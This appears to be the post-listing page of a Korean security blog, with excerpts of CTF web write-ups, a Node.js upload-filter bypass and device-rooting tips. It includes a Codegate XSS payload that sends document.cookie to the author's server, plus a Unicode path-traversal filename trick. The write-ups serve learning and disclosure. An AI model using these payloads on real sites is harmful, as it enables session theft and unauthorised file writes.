본문 바로가기

전체 글

(161)
Breach CTF-web-Framework Follies 블라인드로 문제파일만 받아서 풀었기에 풀고나니 10솔브 문제였다 뭐든지 마음가짐이 중요한것같다.next.js의 지식이 부족하기에 문제는 정말 어려웠고 server.js도 라우팅도 모두 동적으로 해준다는것을 깨닫는데 시간이 조금 걸렸다.ioEYWhJqZO폴더에서 flag를 출력하는 함수와 이폴더의 페이지에서만 button클릭시 동작하는 부분이 있는것을 볼수있다.저함수를 실행시키는 방법을 찾는데 많은 시간을 사용했고 test버튼을 클릭시에 다음과 같이 통신하는것을 확인했고 codegate의 웹문제에서 action값을 변조시킨것처럼 이번에도 action을 바꾸면 될것같았다. /_next/static/chunks/app/ioEYWhJqZO/page-46ecf19b8ba66948.js경로에서 중요한 action ..
nodejs로 파일 업로드 필터링 우회 방법 https://huntr.com/bounties/92a875fe-c5b3-485c-b03f-d3185189e0b1AI 관련  1-day를 보던중 신기해서 찾아보았다. https://www.nodejs-security.com/learn/secure-file-handling/weak-multer-file-name-manipulation Weak Multer File Name Manipulation www.nodejs-security.com다음처럼 누가 정리해둔 취약점이다.file.originalname = Buffer.from(file.originalname, "latin1").toString("utf8")다음과같은 파일업로드시 파일명 및 경로를 처리하는 시스템이 있을때filename = "..丯..丯..丯..
dicectf-web-공부 cookie-recipes-v3bake시에 배열값을 number에 넣을경우 length조건을 우회하고 Number함수과정에서 배열을 문자열로 바꾸고 이를 숫자로 바꾸기에 cookie의 값이 오르게 되어 flag를 획득할수있게된다. pyramidreq.on부분을 비동기처리로 해당 패킷이 완료되기전에 token이 발급되는점을 이용해 비동기처리를 늘어트리고(HTTP 헤더만 전송 body 데이터는 일부로 보내지않고 end가 안되게유지시키고 recv를 통해 토큰만받아서 이용하면된다)) 받은 토큰을 이용해 추천인 코드를 발급받아 추천인코드에 유저체크는 없기에 자기자신을 계속해서 추천하면된다.(추천인과 정산버튼의 로직상 자기자신을 추천할경우를 고려안했기에 값이 기하급수적으로증가한다.)web-nobin먼저 messag..
Codegate2025-공부 1. hide-and-seek(web)https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps Digging for SSRF in NextJS appsAt Assetnote, we encounter sites running NextJS extremely often; in this blog post we will detail some common misconfigurations we find in NextJS websites, along with a vulnerability we found in the framework.www.assetnote.ioawait fetch를 통해 요청시 해당버전의 nextjs의 경우문제의 exter..
codegate 2025-Masquerade 1.터키어를 이용한 권한변경d760525e-a019-4dcc-a9bb-107768cbdec31234admın4aeadcf5-fd2c-4113-b0c1-6dbdd7d1aa641234ıNSPECTOR2.base tag를 이용한 내서버로 리다이렉트3. 내서버에서 admin/test페이지로 리다이렉트후 내서버로 다시 리다이렉트http://내서버ip/admin/test/?title=%3Cimg%20src=%22x%22%20onerror=%22location.href=%27http://내서버ip/codegate/%27%2bdocument.cookie%22%3E&content=b 분발해야겠다! 추가base태그 말고도 두가지방식이 더있었다.Dom clobbering- name을 통해 window.conf에 접근하면서 ..
GCP, 구글클라우드 서버운영 중 SSH 갑자기 접속이 안될때 구글클라우드를 통해 서버운영중에 갑자기 SSH접속이 계속 실패하는 현상이 있었고 SSH키 직접할당 등 여러 삽질 끝에  https://hyungin0505.tistory.com/61 [GCP] SSH authentication has failed 디스크 용량 부족으로 인한 SSH 접속 실패 해결2024-01-29 작성됨Ubuntu 20.04 LTSGoogle Cloud Platform Service 얼마 전 연재했던 GCP 마인크래프트 24시간 서버 열기의 연장선이라고 할 수 있겠다지금껏 서버에서 발생한 여러 가지 사소한 오류들을 해결해hyungin0505.tistory.com이블로그를 통해 해결했다. No space left on device세부정보에 직렬포트의 로그를 봤을때 똑같이 해당 구문이 있었고..
안드로이드 탈옥시 오딘에서 file analysis 멈춤 현상 해결법 많은 블로그에서 다음처럼 AP에 magisk로 패치된 AP만 넣으라고 되어있는데 BL, CP ,CSC, USERDATA를 모두 채워 넣어줘야정상적으로 진행됩니다.즉 AP는 magisk로 패치된 AP를 넣고 나머지는 기존에 넣었던걸로 채워주면 정상적으로 진행 이것때문에 많은 삽질을 했습니다.
탈옥된 IOS frida실행시 재부팅현상 해결방안 https://github.com/frida/frida/issues/2916 Frida 16.4.5 Not working with Jailbroken iOS Version 15.8.2 using Dopamnie · Issue #2916 · frida/fridaHello Team, I installed the latest Frida from the repo build.frida.re. When I try to execute the command "frida-ps -U" from a Windows PC. The device crashed and rebooted after executing the command...github.comfrida 16.4. 버전 이상에서 발생하는 문제로 탈옥에 사용되는 도파민의 ..